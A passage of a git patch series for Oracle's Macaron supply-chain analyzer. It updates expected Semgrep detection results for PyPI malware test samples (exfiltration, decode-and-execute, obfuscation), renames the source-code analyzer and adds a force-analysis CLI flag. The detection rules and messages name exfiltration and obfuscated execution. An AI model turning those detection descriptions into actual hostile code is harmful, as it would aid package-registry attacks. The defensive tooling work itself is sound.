}, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 50, + "end": 50 + } + ] } +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index d3537611e..a905dc12d 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -1,223 +1,232 @@ { - "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 30, - "end": 30 - }, - { - 
"file": "obfuscation/decode_and_execute.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 67, - "end": 67 - } - ], - "src.macaron.resources.pypi_malware_rules.obfuscation_inline-imports": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 44, - "end": 44 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 23, - "end": 23 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 24, - "end": 24 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 25, - "end": 25 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 26, - "end": 26 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 27, - "end": 27 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 28, - "end": 28 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 29, - "end": 29 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 31, - "end": 31 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 32, - "end": 32 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 69, - "end": 69 - } - ], - "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": [ - { - "file": "obfuscation/obfuscation_tools.py", - "start": 23, - "end": 23 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 25, - "end": 31 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 26, - "end": 26 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 27, - "end": 27 - }, - { - "file": "obfuscation/obfuscation_tools.py", - 
"start": 28, - "end": 28 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 30, - "end": 31 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 37, - "end": 37 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 39, - "end": 45 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 40, - "end": 40 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 41, - "end": 41 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 42, - "end": 42 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 44, - "end": 45 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 51, - "end": 51 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 53, - "end": 59 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 54, - "end": 54 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 56, - "end": 56 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 58, - "end": 59 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 61, - "end": 61 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 65, - "end": 65 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 68, - "end": 68 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 68, - "end": 68 - } - ] + "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": { + "message": "Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 30, + "end": 30 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": 
"obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 67, + "end": 67 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_inline-imports": { + "message": "Found an instance of a suspicious API in a hardcoded inline import", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 44, + "end": 44 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 24, + "end": 24 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 25, + "end": 25 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 29, + "end": 29 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 31, + "end": 31 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 32, + "end": 32 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 69, + "end": 69 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": { + "message": "Found an indicator of the use of a python code obfuscation tool", + "detections": [ + { + "file": "obfuscation/obfuscation_tools.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 25, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 26, + "end": 26 + }, + { + "file": 
"obfuscation/obfuscation_tools.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 30, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 37, + "end": 37 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 39, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 40, + "end": 40 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 41, + "end": 41 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 42, + "end": 42 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 44, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 51, + "end": 51 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 53, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 54, + "end": 54 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 56, + "end": 56 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 58, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 61, + "end": 61 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 65, + "end": 65 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + } + ] + } } From 5bcd90eb5ffc5d7172f63572192f4d9700b19b2c Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 26 Mar 2025 14:52:46 +1000 Subject: [PATCH 28/37] fix: updated sourcecode analyzer name appropriately Signed-off-by: Carl Flottmann --- 
.../pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index 82e2406af..7632884b1 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -51,7 +51,7 @@ def __init__(self, resources_path: str | None = None) -> None: validation of the custom rule path failed. """ super().__init__( - name="anomalous_version_analyzer", + name="suspicious_patterns_analyzer", heuristic=Heuristics.SUSPICIOUS_PATTERNS, depends_on=[(Heuristics.EMPTY_PROJECT_LINK, HeuristicResult.FAIL)], ) From 6086e26fe103225f0ec45503a288ca1521b91058 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 31 Mar 2025 11:12:45 +1000 Subject: [PATCH 29/37] chore: sourcecode analyzer now depends on source code repo heuristic Signed-off-by: Carl Flottmann --- .../pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index 7632884b1..6c4bf7d29 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -53,7 +53,7 @@ def __init__(self, resources_path: str | None = None) -> None: super().__init__( name="suspicious_patterns_analyzer", heuristic=Heuristics.SUSPICIOUS_PATTERNS, - depends_on=[(Heuristics.EMPTY_PROJECT_LINK, HeuristicResult.FAIL)], + depends_on=[(Heuristics.SOURCE_CODE_REPO, HeuristicResult.FAIL)], ) if resources_path is None: resources_path = global_config.resources_path 
From 2fe39dcc346c724c0f8c1faee0ada0a894e568cf Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 14 Apr 2025 11:15:50 +1000 Subject: [PATCH 30/37] fix: now depends on source code repo being skipped as well Signed-off-by: Carl Flottmann --- .../sourcecode/pypi_sourcecode_analyzer.py | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index 6c4bf7d29..02bad65cd 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -53,7 +53,13 @@ def __init__(self, resources_path: str | None = None) -> None: super().__init__( name="suspicious_patterns_analyzer", heuristic=Heuristics.SUSPICIOUS_PATTERNS, - depends_on=[(Heuristics.SOURCE_CODE_REPO, HeuristicResult.FAIL)], + # We include the SKIP condition here as we want to consider the case where EMPTY_PROJECT_LINK fails, + # meaning SOURCE_CODE_REPO is skipped, as this is still a scenario where the source code repository + # is not available, so we want to run source code analysis. 
+ depends_on=[ + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.FAIL), + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.SKIP), + ], ) if resources_path is None: resources_path = global_config.resources_path From 23aa6136ae94629e28c9be025cc11cac7e428992 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 17 Apr 2025 10:55:47 +1000 Subject: [PATCH 31/37] chore: rebasing onto main Signed-off-by: Carl Flottmann --- src/macaron/slsa_analyzer/package_registry/pypi_registry.py | 5 ----- 1 file changed, 5 deletions(-) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 8f86f0dc1..2c6af515c 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -20,12 +20,7 @@ from requests import RequestException from macaron.config.defaults import defaults -<<<<<<< HEAD -from macaron.errors import ConfigurationError, InvalidHTTPResponseError -======= -from macaron.database.table_definitions import Component from macaron.errors import ConfigurationError, InvalidHTTPResponseError, SourceCodeError ->>>>>>> 0de258c9 (refactor: support for semgrep as the code analysis tool) from macaron.json_tools import json_extract from macaron.malware_analyzer.datetime_parser import parse_datetime from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry From 8c444acfc015b630fb19bfebbe59c1b36acf0591 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 17 Apr 2025 11:00:16 +1000 Subject: [PATCH 32/37] chore: rebasing onto main Signed-off-by: Carl Flottmann --- .../slsa_analyzer/checks/detect_malicious_metadata_check.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 9b056da4c..0196ec93b 100644 --- 
a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -297,8 +297,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: has_repository=ctx.component.repository is not None, pypi_registry=pypi_registry, package_json={}, - package_sourcecode={}, - package_sourcecode_path="" + package_sourcecode_path="", ) pypi_registry_info.metadata.append(pypi_package_json) From ee2b8fdbb7a77bf96e43f84813854e4da7f8a9a7 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 17 Apr 2025 14:08:24 +1000 Subject: [PATCH 33/37] fix: build error after rebase fixed Signed-off-by: Carl Flottmann --- src/macaron/repo_finder/repo_finder_pypi.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/macaron/repo_finder/repo_finder_pypi.py b/src/macaron/repo_finder/repo_finder_pypi.py index 7525c3779..cd9b331a7 100644 --- a/src/macaron/repo_finder/repo_finder_pypi.py +++ b/src/macaron/repo_finder/repo_finder_pypi.py @@ -67,7 +67,7 @@ def find_repo( break if not pypi_asset: - pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}) + pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}, "") if not pypi_asset.package_json and not pypi_asset.download(dest=""): return "", RepoFinderInfo.PYPI_HTTP_ERROR From 2afcd59c9ca925c29361c8509c804d931d46a804 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 17 Apr 2025 16:27:13 +1000 Subject: [PATCH 34/37] fix: ci problems with formatting on test file Signed-off-by: Carl Flottmann --- .../test_detect_malicious_metadata_check.py | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index 3d84ee310..3910b9579 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ 
b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -40,13 +40,15 @@ pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_experimental_malicious_pypi_package"), ], ) -def test_detect_malicious_metadata(mock_global_config: MagicMock, - httpserver: HTTPServer, - tmp_path: Path, - macaron_path: Path, - purl: str, - expected: str, - experimental: bool) -> None: +def test_detect_malicious_metadata( + mock_global_config: MagicMock, + httpserver: HTTPServer, + tmp_path: Path, + macaron_path: Path, + purl: str, + expected: str, + experimental: bool, +) -> None: """Test that the check handles repositories correctly.""" check = DetectMaliciousMetadataCheck() @@ -143,5 +145,5 @@ def test_evaluations(combination: dict[Heuristics, HeuristicResult]) -> None: confidence, triggered_rules = check.evaluate_heuristic_results(combination) assert confidence == 0 - # Expecting this to be a dictionary, so we can ignore the type problems + # Expecting this to be a dictionary, so we can ignore the type problems. 
assert len(dict(triggered_rules)) == 0 # type: ignore[arg-type] From 4b16ae3fba740710e15acae0367faca08a8e6d2f Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 15 May 2025 16:07:02 +1000 Subject: [PATCH 35/37] build: semgrep is no longer an experimental dependency, and updated it to reflect the bfs version Signed-off-by: Carl Flottmann --- Makefile | 2 +- pyproject.toml | 5 +---- 2 files changed, 2 insertions(+), 5 deletions(-) diff --git a/Makefile b/Makefile index dc39b88a6..029cdc163 100644 --- a/Makefile +++ b/Makefile @@ -206,7 +206,7 @@ upgrade: .venv/upgraded-on .venv/upgraded-on: pyproject.toml python -m pip install --upgrade pip python -m pip install --upgrade wheel - python -m pip install --upgrade --upgrade-strategy eager --editable .[actions,dev,docs,hooks,test,test-docker,experimental] + python -m pip install --upgrade --upgrade-strategy eager --editable .[actions,dev,docs,hooks,test,test-docker] $(MAKE) upgrade-quiet force-upgrade: rm -f .venv/upgraded-on diff --git a/pyproject.toml b/pyproject.toml index aa93bd1a4..4fa6b89d5 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -37,6 +37,7 @@ dependencies = [ "beautifulsoup4 >= 4.12.0,<5.0.0", "problog >= 2.2.6,<3.0.0", "cryptography >=44.0.0,<45.0.0", + "semgrep == 1.113.0", ] keywords = [] # https://pypi.org/classifiers/ @@ -107,10 +108,6 @@ test-docker = [ "ruamel.yaml >=0.18.6,<1.0.0", ] -experimental = [ - "semgrep == 1.102.0", -] - [project.urls] Homepage = "https://github.com/oracle/macaron" Changelog = "https://github.com/oracle/macaron/blob/main/CHANGELOG.md" From c3c43a7106403ad9da9923908beaa01673c91004 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 19 May 2025 11:15:20 +1000 Subject: [PATCH 36/37] fix: confirm semgrep uninstall, and remove 'experimental' mentions --- docker/Dockerfile.final | 2 +- src/macaron/__main__.py | 2 +- src/macaron/malware_analyzer/README.md | 4 ++-- .../checks/detect_malicious_metadata_check.py | 2 +- .../pypi/test_pypi_sourcecode_analyzer.py | 2 +- 
.../checks/test_detect_malicious_metadata_check.py | 10 ++++++---- 6 files changed, 12 insertions(+), 10 deletions(-) diff --git a/docker/Dockerfile.final b/docker/Dockerfile.final index ad1d88c19..49c1071cf 100644 --- a/docker/Dockerfile.final +++ b/docker/Dockerfile.final @@ -46,7 +46,7 @@ RUN : \ && . .venv/bin/activate \ && pip install --no-compile --no-cache-dir --upgrade pip setuptools \ && find $HOME/dist -depth \( -type f \( -name "macaron-*.whl" \) \) -exec pip install --no-compile --no-cache-dir '{}' \; \ - && pip uninstall semgrep \ + && pip uninstall semgrep -y \ && find $HOME/dist -depth \( -type f \( -name "semgrep-*.whl" \) \) -exec pip install --no-compile --no-cache-dir '{}' \; \ && rm -rf $HOME/dist \ && deactivate diff --git a/src/macaron/__main__.py b/src/macaron/__main__.py index 2833b32af..fad56aaa4 100644 --- a/src/macaron/__main__.py +++ b/src/macaron/__main__.py @@ -481,7 +481,7 @@ def main(argv: list[str] | None = None) -> None: required=False, action="store_true", help=( - "EXPERIMENTAL. For improved malware detection, analyze the source code of the" + "For improved malware detection, analyze the source code of the" + " (PyPI) package using a textual scan and dataflow analysis." ), ) diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index 9c083e958..bbd32fcb2 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -52,9 +52,9 @@ When a heuristic fails, with `HeuristicResult.FAIL`, then that is an indicator b - **Rule**: Return `HeuristicResult.FAIL` if the major or epoch is abnormally high; otherwise, return `HeuristicResult.PASS`. - **Dependency**: Will be run if the One Release heuristic fails. 
-### Experimental: Source Code Analysis with Semgrep +### Source Code Analysis with Semgrep -The following analyzer has been added in as an experimental feature, available by supplying `--analyze-source` in the CLI to `macaron analyze`: +The following analyzer has been included as an optional feature, available by supplying `--analyze-source` in the CLI to `macaron analyze`: **PyPI Source Code Analyzer** - **Description**: Uses Semgrep, with default rules written in `src/macaron/resources/pypi_malware_rules` and custom rules available by supplying a path to `custom_semgrep_rules` in `defaults.ini`, to scan the package `.tar` source code. diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 0196ec93b..31ff353f2 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -316,7 +316,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: confidence = Confidence.HIGH result_type = CheckResultType.PASSED - # experimental sourcecode analysis feature + # optional sourcecode analysis feature if ctx.dynamic_data["analyze_source"]: try: sourcecode_result, sourcecode_detail_info = self.analyze_source( diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index 3fb423e46..16f246407 100644 --- a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -1,7 +1,7 @@ # Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
-"""Tests for experimental feature detecting malicious patterns in PyPI package sourcecode.""" +"""Tests detecting malicious patterns in PyPI package sourcecode.""" import json import os from unittest.mock import MagicMock, patch diff --git a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index 3910b9579..fe7c2f701 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -26,7 +26,7 @@ @patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.global_config") @pytest.mark.parametrize( - ("purl", "expected", "experimental"), + ("purl", "expected", "sourcecode_analysis"), [ # TODO: This check is expected to FAIL for pkg:pypi/zlibxjson. However, after introducing the wheel presence # heuristic, a false negative has been introduced. Note that if the unit test were allowed to access the OSV @@ -37,7 +37,9 @@ pytest.param("pkg:maven:test/test", CheckResultType.UNKNOWN, False, id="test_non_pypi_package"), # TODO: including source code analysis that detects flow from a remote point to a file write may assist in resolving # the issue of this false negative. 
- pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_experimental_malicious_pypi_package"), + pytest.param( + "pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_sourcecode_analysis_malicious_pypi_package" + ), ], ) def test_detect_malicious_metadata( @@ -47,7 +49,7 @@ def test_detect_malicious_metadata( macaron_path: Path, purl: str, expected: str, - experimental: bool, + sourcecode_analysis: bool, ) -> None: """Test that the check handles repositories correctly.""" check = DetectMaliciousMetadataCheck() @@ -56,7 +58,7 @@ def test_detect_malicious_metadata( ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir="", purl=purl) pypi_registry = PyPIRegistry() ctx.dynamic_data["package_registries"] = [PackageRegistryInfo("pip", "pypi", pypi_registry)] - if experimental: + if sourcecode_analysis: ctx.dynamic_data["analyze_source"] = True mock_global_config.resources_path = os.path.join(MACARON_PATH, "resources") From 36d91cfe49b4a7694dcf0b55ea171985c7841624 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 19 May 2025 14:28:47 +1000 Subject: [PATCH 37/37] feat: can now force sourcecode analysis to run via CLI Signed-off-by: Carl Flottmann --- src/macaron/__main__.py | 14 ++++++++++++++ src/macaron/slsa_analyzer/analyze_context.py | 3 +++ src/macaron/slsa_analyzer/analyzer.py | 8 ++++++++ .../checks/detect_malicious_metadata_check.py | 8 +++++--- 4 files changed, 30 insertions(+), 3 deletions(-) diff --git a/src/macaron/__main__.py b/src/macaron/__main__.py index fad56aaa4..7e380d989 100644 --- a/src/macaron/__main__.py +++ b/src/macaron/__main__.py @@ -96,6 +96,10 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None global_config.local_maven_repo = user_provided_local_maven_repo + if analyzer_single_args.force_analyze_source and not analyzer_single_args.analyze_source: + logger.error("'--force-analyze-source' requires '--analyze-source'.") + sys.exit(os.EX_USAGE) + analyzer = 
Analyzer(global_config.output_path, global_config.build_log_path) # Initiate reporters. @@ -174,6 +178,7 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None provenance_payload=prov_payload, verify_provenance=analyzer_single_args.verify_provenance, analyze_source=analyzer_single_args.analyze_source, + force_analyze_source=analyzer_single_args.force_analyze_source, ) sys.exit(status_code) @@ -486,6 +491,15 @@ def main(argv: list[str] | None = None) -> None: ), ) + single_analyze_parser.add_argument( + "--force-analyze-source", + required=False, + action="store_true", + help=( + "Forces PyPI sourcecode analysis to run regardless of other heuristic results. Requires '--analyze-source'." + ), + ) + single_analyze_parser.add_argument( "--verify-provenance", required=False, diff --git a/src/macaron/slsa_analyzer/analyze_context.py b/src/macaron/slsa_analyzer/analyze_context.py index 0f0804dc1..56199e085 100644 --- a/src/macaron/slsa_analyzer/analyze_context.py +++ b/src/macaron/slsa_analyzer/analyze_context.py @@ -53,6 +53,8 @@ class ChecksOutputs(TypedDict): """The local artifact absolute paths.""" analyze_source: bool """True when PyPI source code analysis has been enabled.""" + force_analyze_source: bool + """When True, enforces running source code analysis, regardless of other heuristic results.""" class AnalyzeContext: @@ -107,6 +109,7 @@ def __init__( provenance_info=None, local_artifact_paths=[], analyze_source=False, + force_analyze_source=False, ) @property diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py index ed5dfe039..632fcba17 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -138,6 +138,7 @@ def run( provenance_payload: InTotoPayload | None = None, verify_provenance: bool = False, analyze_source: bool = False, + force_analyze_source: bool = False, ) -> int: """Run the analysis and write results to the output path. 
@@ -158,6 +159,8 @@ def run( Enable provenance verification if True. analyze_source : bool When true, triggers source code analysis for PyPI packages. Defaults to False. + force_analyze_source : bool + When true, enforces running source code analysis regardless of other heuristic results. Defaults to False. Returns ------- @@ -192,6 +195,7 @@ def run( provenance_payload=provenance_payload, verify_provenance=verify_provenance, analyze_source=analyze_source, + force_analyze_source=force_analyze_source, ) if main_record.status != SCMStatus.AVAILABLE or not main_record.context: @@ -311,6 +315,7 @@ def run_single( provenance_payload: InTotoPayload | None = None, verify_provenance: bool = False, analyze_source: bool = False, + force_analyze_source: bool = False, ) -> Record: """Run the checks for a single repository target. @@ -331,6 +336,8 @@ def run_single( Enable provenance verification if True. analyze_source : bool When true, triggers source code analysis for PyPI packages. Defaults to False. + force_analyze_source : bool + When true, enforces running source code analysis regardless of other heuristic results. Defaults to False. 
Returns ------- @@ -542,6 +549,7 @@ def run_single( ) analyze_ctx.dynamic_data["analyze_source"] = analyze_source + analyze_ctx.dynamic_data["force_analyze_source"] = force_analyze_source if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 31ff353f2..57027b73f 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -101,7 +101,7 @@ def _should_skip( return False def analyze_source( - self, pypi_package_json: PyPIPackageJsonAsset, results: dict[Heuristics, HeuristicResult] + self, pypi_package_json: PyPIPackageJsonAsset, results: dict[Heuristics, HeuristicResult], force: bool = False ) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the source code of the package with a textual scan, looking for malicious code patterns. @@ -112,6 +112,8 @@ def analyze_source( results: dict[Heuristics, HeuristicResult] Containing all heuristics' results (excluding this one), where the key is the heuristic and the value is the result associated with that heuristic. + force: bool + Forces sourcecode analysis to run regardless of heuristic results. Defaults to False. 
Returns ------- @@ -128,7 +130,7 @@ def analyze_source( logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) analyzer = PyPISourcecodeAnalyzer() - if analyzer.depends_on and self._should_skip(results, analyzer.depends_on): + if not force and analyzer.depends_on and self._should_skip(results, analyzer.depends_on): return HeuristicResult.SKIP, {} try: @@ -320,7 +322,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: if ctx.dynamic_data["analyze_source"]: try: sourcecode_result, sourcecode_detail_info = self.analyze_source( - pypi_package_json, heuristic_results + pypi_package_json, heuristic_results, force=ctx.dynamic_data["force_analyze_source"] ) except (HeuristicAnalyzerValueError, ConfigurationError): return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN)